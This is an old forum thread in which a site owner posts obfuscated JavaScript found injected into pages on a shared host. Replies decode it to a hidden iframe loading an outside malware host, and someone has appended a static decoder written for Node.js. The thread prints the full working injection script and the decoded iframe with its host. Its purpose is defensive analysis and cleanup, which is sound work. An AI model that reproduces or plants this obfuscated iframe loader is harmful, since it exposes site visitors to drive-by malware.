
[other] Found strange javascript code on multiple domains on my shared host



s0c0
February 3rd, 2010, 03:58 AM
I found the following javascript on multiple domains on my shared hosting account. I've removed any remnants I could find. I just noticed this the other day. I am definitely going to change my passwords, but I was wondering if anyone has seen anything like this before:



<script>c46d278='';r935ebef290=document;r935ebef290.write( '<scr'+'ipt>function r4569f8(rf5689){return e'+c46d278+'val(rf5689); }</scr'+'ipt>'); function c461134c94r570039(r9fcf87c5e9){ var d5e7='';return (r4569f8('p'+d5e7+'arseInt')(r9fcf87c5e9,16));}fun ction rcb3e7ac446d(r9e84868f){ function ra8e2732(){var rd81c7eb9a71=2;return rd81c7eb9a71;} var r12ae09a5cda='';r6791d='fromCh';r587192=String[r6791d+'arCode'];for(r8a86e310237=0;r8a86e310237<r9e84868f.length;r8a86e310237+=ra8e2732()){ r12ae09a5cda+=(r587192(c461134c94r570039(r9e84868f .substr(r8a86e310237,ra8e2732()))));}return r12ae09a5cda;} var r9f0e9628='3C7363726970743E69662821'+c46d278+'6D79 6961'+c46d278+'297B646F63756D656E742E7772697465287 56E65736361'+c46d278+'7065282027253363253639253636 253732253631'+c46d278+'253664253635253230253665253 631'+c46d278+'253664253635253364253633253334253336 25323025373325373225363325336425323725363825373425 3734253730253361'+c46d278+'25326625326625373425363 52537322536392537332537342536662537322536392536652 53633253265253633253666253664253266253734253733253 26625363925366525326525363325363725363925336625363 32536662536342536392536652625323725326225346425363 1'+c46d278+'25373425363825326525373225366625373525 3665253634253238253464253631'+c46d278+'25373425363 8253265253732253631'+c46d278+'25366525363425366625 3664253238253239253261'+c46d278+'25333625333025333 82533342532392532622532372533332532372532302537372 53639253634253734253638253364253331'+c46d278+'2533 35253336253230253638253635253639253637253638253734 25336425333325333925323025373325373425373925366325 36352533642532372537362536392537332536392536322536 39253663253639253734253739253361'+c46d278+'2536382 53639253634253634253635253665253237253365253363253 266253639253636253732253631'+c46d278+'253664253635 2533652729293B7D7661'+c46d278+'72206D796961'+c46d2 78+'3D747275653B3C2F7363726970743E';r935ebef290.wr ite(rcb3e7ac446d(r9f0e9628));</script><script>check_content()</script>


I know javascript, but I'm not devious like this. It looks very nasty though.

The Cog
February 3rd, 2010, 04:23 PM
I think it ends up writing something like this into the document:


<iframe name=c46 src='http://teristorinc.com/ts/in.cgi?codin&'+Math.round(Math.random()*6084)+'3' width=156 height=39 style='visibility:hidden'></iframe>

unspawn
February 3rd, 2010, 07:37 PM
"I've removed any remnants I could find."
What you did was patch symptoms, not fix the cause. You might be running vulnerable, unpatched software versions, or there might be an infected website management client unknowingly tainting uploaded files, or the server configuration might be set too lax, or anything else along those lines.

*Raz0r*
February 6th, 2010, 02:36 AM
It doesn't look like a security vulnerability really but instead more like an outdated script with a file that might be corrupt.

The Cog
February 7th, 2010, 01:15 AM
No, it's a heavily obfuscated script that loads a hidden iframe from another server. I presume that the server is a compromised one that serves browser busting malware. The script is up to no good, and should not be there.
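
Added example, not part of the original thread: a static decoder for the layering discussed above (empty-string padding spliced into a hex literal, which decodes to an unescape() call holding the percent-encoded iframe markup). It uses string operations only and runs under Node.js; the sample input, the host example.invalid and all function names are constructed for illustration.

```javascript
// Static decoder: peels the layers with string operations only.
// It never calls eval(), unescape() or document.write() on the sample.

// CONSTRUCTED sample (not the script from the post): same layering, harmless
// target, with a junk '+j+' splice and a stray space as in a forum paste.
const SAMPLE = [
  "<script>j='';var p='777269746528756E65736361'+j+",
  "'706528272533436966 72616D65207372633D687474703A2F2F6578616D706C65'+j+",
  "'2E696E76616C69642F61253345272929';document.write(dec(p));</script>",
].join("");

function hexToText(hex) {
  const clean = hex.replace(/\s+/g, "");
  if (clean.length % 2 !== 0) return null; // not whole bytes, leave it alone
  return clean.replace(/../g, (b) => String.fromCharCode(parseInt(b, 16)));
}

function percentDecode(s) { // tolerant stand-in for unescape(); never throws
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

function deobfuscate(source) {
  // 1. Variables assigned '' are padding; drop every '+name+' splice.
  let text = source;
  for (const [, name] of source.matchAll(/(\w+)\s*=\s*''\s*;/g)) {
    text = text.replace(new RegExp(`'\\s*\\+\\s*${name}\\s*\\+\\s*'`, "g"), "");
  }
  // 2. Long hex-only string literals are the encoded second stage.
  const layers = [];
  for (const [, hex] of text.matchAll(/'([0-9A-Fa-f\s]{16,})'/g)) {
    const stage = hexToText(hex);
    if (stage === null) continue;
    layers.push(stage);
    // 3. Inside it, unescape('...') arguments hold the percent-encoded markup.
    for (const [, arg] of stage.matchAll(/unescape\(\s*'([^']*)'\s*\)/g)) {
      layers.push(percentDecode(arg));
    }
  }
  // 4. Report what the final markup would have loaded.
  const iframeSrcs = layers.flatMap((l) =>
    [...l.matchAll(/<iframe\b[^>]*?\bsrc\s*=\s*['"]?([^'"\s>]+)/gi)].map((m) => m[1]));
  return { layers, iframeSrcs };
}

console.log(deobfuscate(SAMPLE));
```

The recovered iframe host is the indicator to search for in web server files and outbound proxy logs when checking the other domains on the account.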